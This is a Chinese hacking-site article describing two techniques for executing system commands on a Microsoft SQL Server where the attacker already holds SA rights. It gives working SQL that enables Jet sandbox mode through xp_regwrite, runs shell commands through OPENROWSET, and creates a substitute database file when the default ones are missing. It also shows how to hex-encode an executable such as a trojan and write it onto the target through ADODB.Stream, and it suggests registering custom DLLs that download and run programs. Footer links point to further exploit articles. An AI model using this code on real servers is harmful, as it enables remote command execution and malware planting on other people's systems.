MSSQL中两种特别的执行命令的方法

所属分类: 网络安全 / 脚本攻防 阅读数: 149
收藏 0 赞 0 分享
以下方法都以需要SA权限为前提。
1, 沙盒模式的变通.

原始方法:
第一句开启沙盘模式:exec master..xp_regwrite ’HKEY_LOCAL_MACHINE’,’SOFTWARE\Microsoft\Jet\4.0\Engines’,’SandBoxMode’,’REG_DWORD’,1
复制代码第二句利用jet.oledb执行系统命令:select * from openrowset(’microsoft.jet.oledb.4.0’,’;database=ias\dnary.mdb’,’select shell("CMD命令")’)
复制代码或select * from openrowset(’microsoft.jet.oledb.4.0’,’;database=ias\ias.mdb’,’select shell("CMD命令")’)
复制代码但是,当 X:\Windows\System32\ias\dnary.mdb 或 X:\Windows\System32\ias\ias.mdb 被删除时,命令就会无效了.
所以利用以下语句创建一个数据库:(数据库名SysSetup.xml,后缀.xml是自定义,不影响使用.)

复制代码
代码如下:

declare @hr int
declare @object int;declare @property int
exec @hr = sp_OACreate ’ADOX.Catalog’,@object OUTPUT
exec @hr = sp_OAMethod @object,’Create’,@property output,’Provider=Microsoft.Jet.OLEDB.4.0;Data Source=SysSetup.xml’

然后再利用jet.oledb调用SysSetup.xml执行系统命令:select * from openrowset(’microsoft.jet.oledb.4.0’,’;database=SysSetup.xml’,’select shell("CMD命令")’)


2, 直接写入文件到对方计算机,此处的文件可以是exe, dll,等.(注,此方法不支持文件大于64KB)
当已经有一个程序需要放到对方计算机的时候.(例如, 放MA。)
将这个文件转成HEX代码。
如果不知道怎么把文件转成HEX代码,请使用下面的工具.
File2Hex.rar (424 Bytes)

使用方法很简单, 解压出来之后, 把要转的文件拖到脚本上去, 就会生成包含HEX代码的文本.
然后用以下方法写入到对方计算机中。

复制代码
代码如下:

DECLARE @ObjectToken INT
EXEC sp_OACreate ’ADODB.Stream’, @ObjectToken OUTPUT
EXEC sp_OASetProperty @ObjectToken, ’Type’, 1
EXEC sp_OAMethod @ObjectToken, ’Open’
EXEC sp_OAMethod @ObjectToken, ’Write’, NULL, 0x123456(其中0x123456为HEX内容)
EXEC sp_OAMethod @ObjectToken, ’SaveToFile’, NULL, ’Test.exe(文件名)’, 2
EXEC sp_OAMethod @ObjectToken, ’Close’
EXEC sp_OADestroy @ObjectToken


写入之后, 就发挥你的办法去执行你写入的这个文件就OK了。

集思广益:
现在很多计算机可以执行命令的方法都被人封得抓狂,就算有幸可以执行,也有可能CMD被改了权限..
所以我推荐的办法是有能力的同学自己开发DLL,然后把DLL写入到对方计算机中,再注册为存储过程.
至于存储过程的功能. 可以是下载程序并执行, 可以是直接执行命令. 当然这个看你自己了.
更多精彩内容其他人还在看

ECSHOP php商城系统过滤不严导致SQL注入漏洞

ECSHOP是一款开源免费的网上商店系统。由专业的开发团队升级维护,为您提供及时高效的技术支持,您还可以根据自己的商务特征对ECSHOP进行定制,增加自己商城的特色功能
收藏 0 赞 0 分享

DEDECMS网站管理系统模板执行漏洞(影响版本v5.6)

DedeCms 基于PHP+MySQL的技术开发,支持Windows、Linux、Unix等多种服务器平台,从2004年开始发布第一个版本开始,至今已经发布了五个大版本
收藏 0 赞 0 分享

网站被SQL注入防范(WebKnight)

分享一下内容篡改式攻击的判断方法、SQL注入攻击的防范、以及被攻击后的补救(数据恢复)相关知识
收藏 0 赞 0 分享

手工注入方法,方便大家测试程序漏洞

手工注入方法,方便大家测试程序漏洞,本人只供学习交流,不建议搞破坏。
收藏 0 赞 0 分享

XSS漏洞报告

对于的用户输入搜索出现XSS漏洞的问题,主要是由于开发人员对XSS了解不足,安全的意识不够造成的。现在让我们来普及一下XSS的一些常识,以后在开发的时候,每当有用户输入的内容时,都要加倍小心
收藏 0 赞 0 分享

PHP Webshell 下的端口反弹方法

phpspy2011 中的 Back Connect 怎么弄都不能反弹回来,在网上找了段代码,测试成功了,但自己看了下,这段代码貌似也是从 phpspy 中分离出来的
收藏 0 赞 0 分享

万博企业网站管理系统注入漏洞(MemberLogin.asp)

这个注入漏洞发生在html/MemberLogin.asp文件里,在Include下有NoSqlHack.Asp文件也没调用,呵呵,就有了我们利用的地方了
收藏 0 赞 0 分享

PJBlog3 V3.2.8.352文件Action.asp修改任意用户密码

PJBlog一套开源免费的中文个人博客系统程序,采用asp+Access的技术,具有相当高的运作效能以及更新率,也支持目前Blog所使用的新技术
收藏 0 赞 0 分享

mysql注入导库脚本代码

mysql注入导库脚本代码,学习安全的朋友要注意防范。
收藏 0 赞 0 分享

BOSSI 公司企业网站管理系统注入&上传漏洞利用

BOSSI 公司(企业)网站管理系统,中英文双语版,后台在同一页内同时管理添加修改资料内的中英文内容,网站的左边栏使用了模块,可以自由的增加&删除,可以不用修改代码
收藏 0 赞 0 分享
查看更多